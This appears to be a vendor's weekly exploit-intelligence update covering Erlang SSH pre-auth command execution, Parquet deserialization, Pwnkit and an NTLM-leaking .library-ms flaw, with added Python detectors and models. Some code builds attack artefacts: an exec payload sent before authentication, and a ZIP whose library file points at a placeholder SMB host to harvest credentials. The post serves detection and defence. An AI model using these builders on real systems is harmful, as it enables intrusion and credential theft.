Happy Friday! Here is the content the VulnCheck Initial Access Intelligence team delivered this week:
The team added an exploit for the Erlang/OTP SSH library authentication bypass. This vulnerability currently has an EPSS percentile of 0.87 and more than a dozen public exploits, indicating that internet-wide exploitation attempts are very likely.
This exploit takes advantage of the server accepting SSH connection-protocol messages outside the expected authentication path: the attacker opens a channel and sends an exec request before ever authenticating. In Erlang's SSH implementation the exec channel hands the request to an Erlang interpreter, so savvy attackers can write post-exploitation components directly in Erlang rather than as shell commands and potentially evade detection mechanisms built for the latter. The team accounted for this and provided PCAPs and signatures detecting this variant technique.
Open-source usage of the library does not appear to be widespread, but the team identified a few hundred Erlang SSH servers exposed to the internet.
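The following is an added detection example, not VulnCheck's exploit or signatures. It assumes, as the public proofs of concept do, that the offending CHANNEL_OPEN and exec CHANNEL_REQUEST messages are sent right after KEXINIT and before NEWKEYS, so they travel in the clear and a sensor can parse them with the plain SSH binary packet format from RFC 4253. The client streams it inspects are constructed inline (not captures), and the Erlang-call regex is a simple heuristic for the interpreter-based variant described above.

```python
import re
import struct

# SSH message numbers (RFC 4253 transport, RFC 4254 connection protocol)
SSH_MSG_NEWKEYS = 21
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98

# Heuristic for an Erlang expression such as os:cmd("...") handed to the exec channel.
ERLANG_CALL = re.compile(rb"\b[a-z][A-Za-z0-9_]*:[a-z][A-Za-z0-9_]*\(")


def ssh_string(b: bytes) -> bytes:
    """Encode an SSH 'string': uint32 big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def read_string(buf: bytes, off: int):
    """Decode an SSH 'string' at offset off; return (value, new offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n


def ssh_packet(payload: bytes) -> bytes:
    """Wrap a payload in the unencrypted SSH binary packet format (RFC 4253 section 6):
    uint32 packet_length, byte padding_length, payload, at least 4 bytes of padding,
    total length a multiple of the 8-byte block size."""
    pad = 8 - ((len(payload) + 5) % 8)
    if pad < 4:
        pad += 8
    return struct.pack(">IB", len(payload) + 1 + pad, pad) + payload + b"\x00" * pad


def cleartext_payloads(stream: bytes):
    """Yield the payloads a client sends before SSH_MSG_NEWKEYS. Up to that point
    nothing is encrypted, so the packets can be parsed directly; afterwards the
    stream is ciphertext and parsing stops."""
    off = 0
    if stream.startswith(b"SSH-"):
        off = stream.index(b"\r\n") + 2  # skip the protocol identification line
    while off + 5 <= len(stream):
        plen, padlen = struct.unpack_from(">IB", stream, off)
        payload = stream[off + 5:off + 4 + plen - padlen]
        if not payload:
            break
        yield payload
        if payload[0] == SSH_MSG_NEWKEYS:
            break
        off += 4 + plen


def find_preauth_channel_activity(client_stream: bytes) -> list:
    """Flag connection-protocol messages that arrive before key exchange has even
    finished, i.e. before any authentication could have taken place."""
    findings = []
    for payload in cleartext_payloads(client_stream):
        msg = payload[0]
        if msg == SSH_MSG_CHANNEL_OPEN:
            ctype, _ = read_string(payload, 1)
            findings.append({"type": "preauth_channel_open",
                             "channel_type": ctype.decode(errors="replace")})
        elif msg == SSH_MSG_CHANNEL_REQUEST:
            req, off = read_string(payload, 5)  # skip msg byte + recipient channel
            off += 1                             # boolean want_reply
            finding = {"type": "preauth_channel_request",
                       "request": req.decode(errors="replace")}
            if req == b"exec":
                cmd, _ = read_string(payload, off)
                finding["command"] = cmd.decode(errors="replace")
                finding["erlang_like"] = bool(ERLANG_CALL.search(cmd))
            findings.append(finding)
    return findings


def build_attack_stream() -> bytes:
    """Constructed (not captured) client->server bytes mimicking the technique:
    KEXINIT, then CHANNEL_OPEN and an exec CHANNEL_REQUEST carrying an Erlang
    expression, with no NEWKEYS or USERAUTH_REQUEST in between."""
    kexinit = (b"\x14" + b"\x00" * 16
               + b"".join(ssh_string(n) for n in [
                   b"curve25519-sha256", b"ssh-ed25519", b"aes128-ctr", b"aes128-ctr",
                   b"hmac-sha2-256", b"hmac-sha2-256", b"none", b"none", b"", b""])
               + b"\x00" + b"\x00" * 4)
    chan_open = (bytes([SSH_MSG_CHANNEL_OPEN]) + ssh_string(b"session")
                 + struct.pack(">III", 0, 0x8000, 0x4000))
    exec_req = (bytes([SSH_MSG_CHANNEL_REQUEST]) + struct.pack(">I", 0)
                + ssh_string(b"exec") + b"\x01"
                + ssh_string(b'os:cmd("id > /tmp/poc.txt").'))
    return (b"SSH-2.0-PoCClient\r\n" + ssh_packet(kexinit)
            + ssh_packet(chan_open) + ssh_packet(exec_req))


def build_benign_stream() -> bytes:
    """Constructed normal client: KEXINIT, NEWKEYS, then opaque encrypted bytes."""
    kexinit = (b"\x14" + b"\x00" * 16 + ssh_string(b"curve25519-sha256") * 8
               + ssh_string(b"") * 2 + b"\x00" * 5)
    return (b"SSH-2.0-OpenSSH_9.6\r\n" + ssh_packet(kexinit)
            + ssh_packet(bytes([SSH_MSG_NEWKEYS])) + b"\x9f\x3a\x11\x07" * 6)


if __name__ == "__main__":
    for finding in find_preauth_channel_activity(build_attack_stream()):
        print(finding)
```

The parser deliberately stops at NEWKEYS: once a session is encrypted a passive sensor cannot see channel requests, so the signal here is specifically "connection-protocol messages in the cleartext window", which a legitimate client never produces.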
This week we bring you a proof of concept for a Java deserialization issue in the Apache Parquet library's Avro schema parsing. This library is popular in projects like Apache Spark. The issue is perhaps better described as an arbitrary class instantiation, which can lead to RCE if the targeted class is in the application's classpath.
We created a custom Docker target and exploit to demonstrate said RCE. The supplied target is based on this public PoC. JLine 2.14.6 was added to make it exploitable for RCE. Target validation and version scanning are not supported in the exploit, since the target we created is generic.
Our friends over at AttackerKB describe exploiting this vulnerability (not for RCE) in a Google Cloud data pipeline, but other real-world targets have yet to be disclosed. We have also supplied a PCAP of our exploitation and network signatures to (hopefully) detect generic exploitation over TCP. Queries will be added if real-world targets are discovered.
By request, an exploit for the "Pwnkit" vulnerability was added to the feed this week. Vulnerable versions of pkexec do not check argc before iterating through and using the passed arguments. This allows an attacker to run pkexec via execve() with an empty argv and specially crafted environment variables; because the kernel lays out argv and envp back to back, pkexec's out-of-bounds read of argv[1] lands on the first environment variable. Ultimately, this allows a malicious gconv library to be loaded and executed by pkexec as root, resulting in privilege escalation.
There is a quirk to the applicability of this vulnerability: it was fixed by an update to Polkit, and a later Linux kernel change that replaces an empty argv with a single empty string at execve() time independently prevents exploitation. For a host to be vulnerable, it therefore needs both an outdated version of Polkit and a kernel missing that change.
Given that this is a local exploit, there are no queries or network rules. The exploit comes with two separate Docker containers. One container runs a virtual machine using QEMU to expose an SSH server on a system using an unpatched kernel and a vulnerable version of Polkit. The second container skips the QEMU step and just runs the SSH server in a container with a vulnerable version of Polkit; this container must be run from a host with an unpatched kernel and was added for specific client needs.
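The following is an added model of the argc == 0 bug class, written here to illustrate the mechanism; it is not the feed's exploit and does not touch a real process image. A Python list stands in for the contiguous pointer array the kernel builds (argv, NULL, envp, NULL), `vulnerable_pick_program` mirrors pkexec's unchecked argument walk, `fixed_pick_program` is the Polkit-side check, and `kernel_execve_argv` models the kernel-side mitigation. The sample environment is constructed.

```python
def process_image(argv, envp):
    """Model of the pointer array the kernel hands a new program on execve():
    the argv strings, a NULL terminator, then the envp strings and their NULL.
    Because it is one contiguous array, argv[len(argv) + 1] is envp[0].
    None stands in for NULL (a Python model, not a real process image)."""
    return [*argv, None, *envp, None]


def vulnerable_pick_program(argc, image):
    """pkexec-style argument walk with no argc check: start at argv[1], skip
    option-looking entries, and take the next entry as the program to run.
    With argc == 0 the loop body never runs and image[1] is read, which is
    envp[0]: attacker-controlled environment data consumed as if it were argv."""
    n = 1
    while n < argc and image[n].startswith("-"):
        n += 1
    return image[n]


def fixed_pick_program(argc, image):
    """Hardened walk (the Polkit-side fix): refuse an empty argv (the real fix
    exits immediately; None stands in for that here) and never read an entry
    at or beyond argc."""
    if argc < 1:
        return None
    n = 1
    while n < argc and image[n].startswith("-"):
        n += 1
    if n >= argc:
        return None  # no program given: usage error instead of reading past argv
    return image[n]


def kernel_execve_argv(argv):
    """Kernel-side mitigation as described above: an empty argv is replaced by a
    single empty string, so no program starts with argc == 0."""
    return list(argv) if argv else [""]


def run_pkexec_model(argv, envp, kernel_patched):
    """What an unpatched pkexec would pick as the program for a given execve()."""
    if kernel_patched:
        argv = kernel_execve_argv(argv)
    return vulnerable_pick_program(len(argv), process_image(argv, envp))


if __name__ == "__main__":
    env = ["PAYLOAD=/tmp/evil-module", "PATH=/usr/bin"]  # constructed sample environment
    print("unpatched kernel, argv=[]:", run_pkexec_model([], env, kernel_patched=False))
    print("patched kernel,   argv=[]:", run_pkexec_model([], env, kernel_patched=True))
```

Run against an empty argv, the unpatched model returns the first environment string, which is exactly why the two Docker targets differ: the container-only target depends on the host kernel still letting a process start with argc == 0.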
CVE-2025-24054 is a recent addition to CISA KEV. This vulnerability was observed by Check Point being used across multiple campaigns targeting government and industry in Romania and Poland.
This vulnerability is triggered when a user extracts or previews a ZIP archive containing a malicious .library-ms file, which causes Windows Explorer to initiate an SMB authentication request to a remote server. As a result, the user's NTLM credentials (the Net-NTLMv2 challenge-response) leak with no interaction beyond handling the archive. The team delivers an exploit that generates the malicious payloads and demonstrates how to catch the SMB authentication request.
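The following is an added example, not VulnCheck's exploit: it builds a .library-ms file whose search location is a UNC path, wraps it in a ZIP as the post describes, and, on the defensive side, scans a ZIP for library files that point at UNC paths. The element set is assumed from Microsoft's published Library Description schema; the `name` and `iconReference` resource strings are typical values copied from stock Windows library files, and the 203.0.113.5 address is a documentation (TEST-NET-3) placeholder.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

LIB_NS = "http://schemas.microsoft.com/windows/2009/library"


def build_library_ms(location: str) -> bytes:
    """Build a Windows Library Description (.library-ms) whose only search
    location is `location`. Pointing that location at a UNC path is what makes
    Explorer reach out over SMB when the file is extracted or previewed."""
    xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIB_NS}">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1003</iconReference>
  <templateInfo>
    <folderType>{{7d49d726-3c21-4f05-99aa-fdc2c9474656}}</folderType>
  </templateInfo>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <isSupported>false</isSupported>
      <simpleLocation>
        <url>{escape(location)}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""
    return xml.encode("utf-8")


def build_library_zip(location: str, entry_name: str = "Documents.library-ms") -> bytes:
    """Wrap the library file in a ZIP, the delivery form described in the post."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, build_library_ms(location))
    return buf.getvalue()


def is_unc(url: str) -> bool:
    """True for \\\\host\\share style paths, which trigger SMB authentication."""
    return url.startswith("\\\\")


def find_unc_library_entries(zip_bytes: bytes):
    """Defender-side check: (entry, url) pairs for .library-ms entries whose
    search location is a UNC path. Only element text is read and nothing is
    resolved; for untrusted input in production prefer defusedxml."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                root = ET.fromstring(zf.read(info))
            except ET.ParseError:
                continue  # not a parseable library file; out of scope here
            for url in root.iter(f"{{{LIB_NS}}}url"):
                text = (url.text or "").strip()
                if is_unc(text):
                    hits.append((info.filename, text))
    return hits


if __name__ == "__main__":
    sample = build_library_zip("\\\\203.0.113.5\\share")  # constructed placeholder target
    print(find_unc_library_entries(sample))
```

Catching the resulting authentication attempt only needs an SMB listener on the named host (Responder or impacket's smbserver both log the Net-NTLMv2 exchange); the scanner above is the inverse check for mail and file gateways, flagging the archive before a user ever extracts it.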